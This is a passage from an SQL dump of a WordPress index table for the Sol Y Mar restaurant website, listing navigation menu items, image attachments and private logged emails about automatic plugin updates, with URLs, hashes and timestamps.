19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2614,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-27/','124:b68d1bba24866b21d92135a823b2541c',4641,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-17 12:44:30','2021-03-17 16:44:30',1,NULL,NULL,NULL,NULL,0,NULL),(2059,NULL,NULL,4212,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2060,NULL,NULL,4213,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2061,NULL,NULL,4214,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2062,NULL,NULL,4215,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2063,NULL,NULL,4216,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2064,NULL,NULL,4217,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2613,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-26/','124:550c77e604f0c25bcf4b52eb32db8953',4640,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-17 00:34:37','2021-03-17 04:34:37',1,NULL,NULL,NULL,NULL,0,NULL),(2065,NULL,NULL,4218,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2066,NULL,NULL,4219,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2067,NULL,NULL,4220,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2068,NULL,NULL,4221,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2069,NULL,NULL,4222,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2612,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-25/','124:48407048b50f7de5bf6aa14806cf5d15',4639,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-16 12:27:19','2021-03-16 16:27:19',1,NULL,NULL,NULL,NULL,0,NULL),(2070,NULL,NULL,4223,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2071,NULL,NULL,4224,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2072,NULL,NULL,4225,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2073,NULL,NULL,4226,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2074,NULL,NULL,4227,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2075,NULL,NULL,4228,'post','nav_menu_item',1,3061,NULL,NULL,'Three Columns','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2611,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-24/','124:c2977d34ed6842da3781ab53108688b7',4638,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-15 01:27:54','2021-03-15 05:27:54',1,NULL,NULL,NULL,NULL,0,NULL),(2076,NULL,NULL,4229,'post','nav_menu_item',1,3061,NULL,NULL,'Four Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2077,NULL,NULL,4230,'post','nav_menu_item',1,3061,NULL,NULL,'Four Columns','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2078,NULL,NULL,4231,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2079,NULL,NULL,4232,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2080,NULL,NULL,4233,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2610,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-23/','124:f43effc83b3350b3a26970389ce22d2a',4637,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-13 01:21:05','2021-03-13 06:21:05',1,NULL,NULL,NULL,NULL,0,NULL),(2081,NULL,NULL,4234,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2082,NULL,NULL,4235,'post','nav_menu_item',1,3061,NULL,NULL,'FIve Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2083,NULL,NULL,4236,'post','nav_menu_item',1,3061,NULL,NULL,'FIve Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2084,NULL,NULL,4237,'post','nav_menu_item',1,3061,NULL,NULL,'Six Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2609,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-22/','124:07d0be00f0d838735b62ff272b6877bc',4636,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-11 13:42:00','2021-03-11 18:42:00',1,NULL,NULL,NULL,NULL,0,NULL),(2085,NULL,NULL,4238,'post','nav_menu_item',1,3061,NULL,NULL,'Six Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2321,NULL,NULL,2771,'post','attachment',1,0,NULL,NULL,'landing-img-10','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-10.jpg',NULL,'2771','attachment-image',NULL,NULL,NULL,'2771','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:56:03','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2322,NULL,NULL,2974,'post','attachment',1,0,NULL,NULL,'landing-print-img-2','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-print-img-2-1.jpg',NULL,'2974','attachment-image',NULL,NULL,NULL,'2974','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:56:05','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2323,NULL,NULL,2975,'post','attachment',1,0,NULL,NULL,'landing-print-img-3','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-print-img-3-1.jpg',NULL,'2975','attachment-image',NULL,NULL,NULL,'2975','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:56:07','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2608,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-21/','124:d3db0ec2338324700573f87fbf654a91',4635,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-10 18:16:59','2021-03-10 23:16:59',1,NULL,NULL,NULL,NULL,0,NULL),(2324,NULL,NULL,2976,'post','attachment',1,0,NULL,NULL,'landing-print-img-6','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-print-img-6-1.jpg',NULL,'2976','attachment-image',NULL,NULL,NULL,'2976','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:56:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2325,NULL,NULL,2978,'post','attachment',1,0,NULL,NULL,'landing-img-2','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-2-1.jpg',NULL,'2978','attachment-image',NULL,NULL,NULL,'2978','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:56:11','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2326,NULL,NULL,2985,'post','attachment',1,0,NULL,NULL,'landing-box-img-1','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-box-img-1.jpg',NULL,'2985','attachment-image',NULL,NULL,NULL,'2985','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:56:12','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2327,NULL,NULL,2986,'post','attachment',1,0,NULL,NULL,'landing-box-img-2','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-box-img-2.jpg',NULL,'2986','attachment-image',NULL,NULL,NULL,'2986','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:56:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2607,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-20/','124:64e6839ca13c7c51ea4dffca9f35a5f6',4634,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-10 00:26:26','2021-03-10 05:26:26',1,NULL,NULL,NULL,NULL,0,NULL),(2328,NULL,NULL,4348,'post','nav_menu_item',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:17','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2329,NULL,NULL,4349,'post','nav_menu_item',1,0,NULL,NULL,'Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:17','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2330,NULL,NULL,4350,'post','nav_menu_item',1,0,NULL,NULL,'Blog','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:17','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2331,NULL,NULL,4351,'post','nav_menu_item',1,0,NULL,NULL,'Shop','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:17','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2332,NULL,NULL,4352,'post','nav_menu_item',1,0,NULL,NULL,'Portfolio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:17','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2606,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-19/','124:4d996fd0b2bd2d623ad9b9cba809fabe',4633,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-09 12:49:54','2021-03-09 17:49:54',1,NULL,NULL,NULL,NULL,0,NULL),(2333,NULL,NULL,4353,'post','nav_menu_item',1,0,NULL,NULL,'Elements','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:17','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2334,NULL,NULL,4354,'post','nav_menu_item',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:17','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2335,NULL,NULL,4355,'post','nav_menu_item',1,0,NULL,NULL,'Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:17','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2336,NULL,NULL,4356,'post','nav_menu_item',1,0,NULL,NULL,'Portfolio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:17','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2337,NULL,NULL,4357,'post','nav_menu_item',1,0,NULL,NULL,'Shop','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:17','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2338,NULL,NULL,4358,'post','nav_menu_item',1,0,NULL,NULL,'Blog','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:17','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2339,NULL,NULL,4359,'post','nav_menu_item',1,0,NULL,NULL,'Elements','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:17','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2605,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-18/','124:d2e8a638458f121517ecd37342b6e7a1',4632,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-08 14:06:00','2021-03-08 19:06:00',1,NULL,NULL,NULL,NULL,0,NULL),(2340,NULL,NULL,4360,'post','nav_menu_item',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:17','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2341,NULL,NULL,4361,'post','nav_menu_item',1,0,NULL,NULL,'Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2342,NULL,NULL,4362,'post','nav_menu_item',1,0,NULL,NULL,'Shop','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2343,NULL,NULL,4363,'post','nav_menu_item',1,0,NULL,NULL,'Portfolio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2344,NULL,NULL,4364,'post','nav_menu_item',1,0,NULL,NULL,'Blog','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2345,NULL,NULL,4365,'post','nav_menu_item',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2604,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-17/','124:3a5ac2c13d6c98e0a428e87c050bc268',4631,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-03-04 16:52:13','2021-03-04 21:52:14',1,NULL,NULL,NULL,NULL,0,NULL),(2346,NULL,NULL,4366,'post','nav_menu_item',1,0,NULL,NULL,'Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2347,NULL,NULL,4367,'post','nav_menu_item',1,0,NULL,NULL,'Shop','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2348,NULL,NULL,4368,'post','nav_menu_item',1,0,NULL,NULL,'Blog','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2349,NULL,NULL,4369,'post','nav_menu_item',1,0,NULL,NULL,'Product Single','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2350,NULL,NULL,4370,'post','nav_menu_item',1,0,NULL,NULL,'Shop 